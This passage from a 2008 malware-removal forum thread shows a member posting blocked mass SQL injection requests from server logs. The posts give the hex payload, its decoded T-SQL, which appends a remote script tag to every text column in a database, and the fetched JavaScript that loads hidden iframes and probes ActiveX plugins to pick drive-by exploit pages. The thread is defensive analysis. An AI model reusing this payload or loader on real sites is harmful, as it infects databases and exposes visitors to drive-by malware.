Author Topic: SQL Injected jscript sites  (Read 71510 times)

0 Members and 1 Guest are viewing this topic.

August 24, 2008, 10:12:03 pm
Reply #105

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

September 20, 2008, 11:24:05 am
Reply #106

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Having problems posting this one, will have to split it up

Sample Log entry
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10 +0000] "GET /forums/index.php?showtopic=4260';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Decoded
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10  0000] "GET /forums/index.php?showtopic=4260';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--'' [' @C '] where ' @C ' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"


Code: [Select]
--11:48:09--  http://www3.ss11qn.cn/csrss/w.js
           => `w.js'
Resolving www3.ss11qn.cn... 121.11.76.85
Connecting to www3.ss11qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
window.onerror=function()
{

document.write("<iframe  width=0 height=0 src=http://www3.ss11qn.cn/csrss/new.htm></iframe>");

return true;
}

if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

document.write("<iframe  width=0 height=0 src=http://www3.ss11qn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}




Code: [Select]
--11:49:47--  http://www3.ss11qn.cn/csrss/new.htm
           => `new.htm'
Resolving www3.ss11qn.cn... 121.11.76.85
Connecting to www3.ss11qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://s123.cnzz.com/stat.php?id=1055584&web_id=1055584" language="JavaScript" charset="gb2312"></script>
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=ani.htm width=100 height=0></iframe>
<Iframe src=08053.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>
<script>
var kaspersky="ffuck"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}   
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}   
try{if(new window["ActiveXObject"]("NCTAudioFile2.AudioFile2.2"))window["document"]["write"]('<iframe style=display:none src=net.htm"></iframe>');}catch(e){} 
try{if(new window["ActiveXObject"]("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src=xl.htm"></iframe>');}catch(e){} 
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script src="http://js.users.51.la/2143797.js"></script>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>



Code: [Select]
--11:53:40--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>



Code: [Select]
--11:58:56--  http://s123.cnzz.com/stat.php
           => `stat.php'
Resolving s123.cnzz.com... 219.232.243.4
Connecting to s123.cnzz.com[219.232.243.4]:80... connected
HTTP request sent, awaiting response... 200 OK

This loads a zero byte page.


Code: [Select]
--12:00:13--  http://js.users.51.la/2143797.js
           => `2143797.js'
Resolving js.users.51.la... 122.224.146.77
Connecting to js.users.51.la[122.224.146.77]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2143797" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');


Code: [Select]
--12:03:42--  http://www.51.la/?2143797
           => `?2143797'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all;}
a {color: #000;text-decoration: none}
a:hover {color: #1653C2}
.a1 {color: #1653C2}
.a1:hover {color: #000}
img {border:none}
div {text-align:left}
#index_menu {margin:auto;width:760px;border-bottom:2px solid #1653C2;padding:0px;height:21px;text-align:center}
#index_menu ul {margin:0px;padding:4px 4px 0px 4px}
#index_menu li {display:inline;}
#index_menu a {color:#1653C2;padding:4px 15px 4px 15px}
#index_menu a:hover {color:#000;background-color:#EFEFEF}
#index_menu a.dq {color:#FFF;background-color:#1653C2}
#allbody {width:760px;margin: 0 auto}
#bottom {float: left;width:760px;text-align: center;margin-top:15px;border-top:1px solid #ACC1E8;padding:10px 0px;background-color:#E0E9FC;}
</style>
<title>us统计报告 - “我要啦”提供</title>
</head>
<body>
<div style="margin:20px 0px 20px 0px;text-align:center"><img alt="我要啦免费统计" src="http://51img.ajiang.net/main_logo.gif" /><br /><a href="http://bbs.51.la/forum-1-1.html">我要啦免费统计</a></div>
<div id="index_menu">
 <ul>
  <li><a href="http://bbs.51.la/forum-1-1.html">站长交流大厅</a></li>
  <li><a href="./" class="dq">首页</a></li>
  <li><a href="reg.asp">申请</a></li>
  <li><a href="login.asp">登录</a></li>
  <li><a href="http://top.51.la/">排行</a></li>
  <li><a href="news.asp">日志</a></li>
  <li><a href="http://help.51.la/">帮助</a></li>
 </ul>
</div>
<div id="allbody">
<div style="line-height:200%;margin:35px;text-align:center">
<a class="a1" href="http://help.51.la/faq/#17">什么是独立查看密码?</a>&nbsp;
<a class="a1" href="login.asp">【us】的站长请点击这里登录</a><br />
<form action="report/0_help.asp" style="margin:5px 0px 18px 0px">
<center>
<input type="hidden" name="id" value="2143797" />
<input type="hidden" name="t" value="chalogin" />
独立查看密码 <input name="LookPass" type="password" size="20" /> <input type="submit" value="查看〖 us 〗的统计报告" />
</center>
</form>

<span style="color:red">请注意: 您可能来自我要啦免费统计用户的网站,我要啦仅提供免费统计服务,与该网站经营活动无关。</span><br />

<a style="font-size:16px" href="reg.asp">申请您自己的免费统计账号</a>
<br /><a href="about.asp" title="为什么选择我要啦免费统计">了解网站现状·把握网站脉搏·超越发展极限——我要啦统计,站长智明的眼睛<!--功能更全面·数据更精确·操作更简便·服务更专业——我要啦统计,当然之选--></a>
<br /><a class="a1" href="report/1_main.asp?id=1" target="_blank" style="font-size:14px"> - 全 功 能 演 示 - </a>
</div>
<div style="width:760px;text-align: center;">
  <a href="http://union.wowowang.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_wowowang.gif" /></a>
  <a href="http://www.nicewords.org/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_nicewords.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.fenghuangchuanqi.com/?51la" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_fenghuangchuanqi.gif" /></a>
  <a href="http://www.zitian.cn/" target="_blank"><img alt="紫田网络平价域名" src="http://51img.ajiang.net/index_ztdm.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>
<div style="margin:15px 0px;text-align:center;width:760px;line-height:20px">善者吾善之,不善者吾亦善之,得善。信者吾信之,不信者吾亦信之,得信。<br />
<span id="ajiang_51la"></span>上善若水。水利万物而不争,处众人之所恶,顾几于道。

</div>
<div style="float: left;width:760px;text-align:center;margin-top:12px">
<a class="a1" href="/rule.asp">用户守则</a>
| <a class="a1" href="/usergetpass.asp">找回密码</a>
| <a class="a1" href="/friend.asp">广告联系</a>
| <a class="a1" href="/users.asp">典型用户</a>
| <a class="a1" href="/contact.asp">联系我们</a>
| <a class="a1" href="/about.asp">关于我们</a>
</div>
<div id="bottom">
服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 豫ICP备05009218号<br />

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
<noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
</div>
</div>

</body>
</html>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>




Code: [Select]
--12:06:53--  http://js.users.51.la/5.js
           => `5.js'
Resolving js.users.51.la... 122.224.146.77
Connecting to js.users.51.la[122.224.146.77]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1; VIP &#x7528;&#x6237;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a5tf="51la";var a5pu="";var a5pf="51la";var a5su=window.location;var a5sf=document.referrer;var a5of="";var a5op="";var a5ops=1;var a5ot=1;var a5d=new Date();var a5color="";if (navigator.appName=="Netscape"){a5color=screen.pixelDepth;} else {a5color=screen.colorDepth;}<\/script><script>a5tf=top.document.referrer;<\/script><script>a5pu =window.parent.location;<\/script><script>a5pf=window.parent.document.referrer;<\/script><script>a5ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a5ops=(a5ops==null)?1: (parseInt(unescape((a5ops)[2]))+1);var a5oe =new Date();a5oe.setTime(a5oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a5ops+ ";path=/;expires="+a5oe.toGMTString();a5ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a5ot==null){a5ot=1;}else{a5ot=parseInt(unescape((a5ot)[2])); a5ot=(a5ops==1)?(a5ot+1):(a5ot);}a5oe.setTime(a5oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a5ot+";path=/;expires="+a5oe.toGMTString();<\/script><script>a5of=a5sf;if(a5pf!=="51la"){a5of=a5pf;}if(a5tf!=="51la"){a5of=a5tf;}a5op=a5pu;try{lainframe}catch(e){a5op=a5su;}document.write(\'<img style="width:0px;height:0px" src="http://vip.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=19&id=5&tpages=\'+a5ops+\'&ttimes=\'+a5ot+\'&tzone=\'+(0-a5d.getTimezoneOffset()/60)+\'&tcolor=\'+a5color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a5of)+\'&vpage=\'+escape(a5op)+\'" \/>\');<\/script>');


Code: [Select]
--12:03:42--  http://www.51.la/?5
           => `?5'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all;}
a {color: #000;text-decoration: none}
a:hover {color: #1653C2}
.a1 {color: #1653C2}
.a1:hover {color: #000}
img {border:none}
div {text-align:left}
#index_menu {margin:auto;width:760px;border-bottom:2px solid #1653C2;padding:0px;height:21px;text-align:center}
#index_menu ul {margin:0px;padding:4px 4px 0px 4px}
#index_menu li {display:inline;}
#index_menu a {color:#1653C2;padding:4px 15px 4px 15px}
#index_menu a:hover {color:#000;background-color:#EFEFEF}
#index_menu a.dq {color:#FFF;background-color:#1653C2}
#allbody {width:760px;margin: 0 auto}
#bottom {float: left;width:760px;text-align: center;margin-top:15px;border-top:1px solid #ACC1E8;padding:10px 0px;background-color:#E0E9FC;}
</style>
<title>我要啦免费统计统计报告 - “我要啦”提供</title>
</head>
<body>
<div style="margin:20px 0px 20px 0px;text-align:center"><img alt="我要啦免费统计" src="http://51img.ajiang.net/main_logo.gif" /><br /><a href="http://bbs.51.la/forum-1-1.html">我要啦免费统计</a></div>
<div id="index_menu">
 <ul>
  <li><a href="http://bbs.51.la/forum-1-1.html">站长交流大厅</a></li>
  <li><a href="./" class="dq">首页</a></li>
  <li><a href="reg.asp">申请</a></li>
  <li><a href="login.asp">登录</a></li>
  <li><a href="http://top.51.la/">排行</a></li>
  <li><a href="news.asp">日志</a></li>
  <li><a href="http://help.51.la/">帮助</a></li>
 </ul>
</div>
<div id="allbody">
<div style="line-height:200%;margin:35px;text-align:center">
<a class="a1" style="font-size:14px" href="report/1_main.asp?id=5">&gt;&gt; 查看〖 我要啦免费统计 〗的统计报告 &gt;&gt;</a><br />

<a style="font-size:16px" href="reg.asp">申请您自己的免费统计账号</a>
<br /><a href="about.asp" title="为什么选择我要啦免费统计">了解网站现状·把握网站脉搏·超越发展极限——我要啦统计,站长智明的眼睛<!--功能更全面·数据更精确·操作更简便·服务更专业——我要啦统计,当然之选--></a>
<br /><a class="a1" href="report/1_main.asp?id=1" target="_blank" style="font-size:14px"> - 全 功 能 演 示 - </a>
</div>
<div style="width:760px;text-align: center;">
  <a href="http://union.wowowang.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_wowowang.gif" /></a>
  <a href="http://www.nicewords.org/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_nicewords.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.fenghuangchuanqi.com/?51la" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_fenghuangchuanqi.gif" /></a>
  <a href="http://www.zitian.cn/" target="_blank"><img alt="紫田网络平价域名" src="http://51img.ajiang.net/index_ztdm.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>
<div style="margin:15px 0px;text-align:center;width:760px;line-height:20px">善者吾善之,不善者吾亦善之,得善。信者吾信之,不信者吾亦信之,得信。<br />
<span id="ajiang_51la"></span>上善若水。水利万物而不争,处众人之所恶,顾几于道。

</div>
<div style="float: left;width:760px;text-align:center;margin-top:12px">
<a class="a1" href="/rule.asp">用户守则</a>
| <a class="a1" href="/usergetpass.asp">找回密码</a>
| <a class="a1" href="/friend.asp">广告联系</a>
| <a class="a1" href="/users.asp">典型用户</a>
| <a class="a1" href="/contact.asp">联系我们</a>
| <a class="a1" href="/about.asp">关于我们</a>
</div>
<div id="bottom">
服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 豫ICP备05009218号<br />

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
<noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
</div>
</div>

</body>
</html>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>

Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

September 20, 2008, 11:24:51 am
Reply #107

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com

Code: [Select]
--12:13:46--  http://bbs.51.la/forum-1-1.html
           => `forum-1-1.html'
Resolving bbs.51.la... 203.171.229.47
Connecting to bbs.51.la[203.171.229.47]:80... connected
HTTP request sent, awaiting response... 200 OK

THis still wont post due to its size, so ive added it as an attachment.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

September 26, 2008, 06:39:03 pm
Reply #108

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

October 11, 2008, 11:00:04 am
Reply #109

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [10/Oct/2008:16:49:11 +0000] "GET /forum/viewtopic.php?f=11&t=28980';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" (malwareremoval.com) "-"

Decoded, note new file location.
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Looks as thou the site is no longer available.
Quote
[www3.ss11qn.cn]
Error getting IP Address:
No such host is known.

Quote
Retrieving DNS records for www3.ss11qn.cn...

Attempt to get a DNS server for www3.ss11qn.cn failed: www3.ss11qn.cn does not exist in the DNS
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

October 12, 2008, 01:39:55 pm
Reply #110

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
New site, we had a total of 44 differnt attempts involving this one in the overnight logs.

Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [11/Oct/2008:14:03:14 +0000] "GET /forum/viewtopic.php?f=11&t=35291';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E45585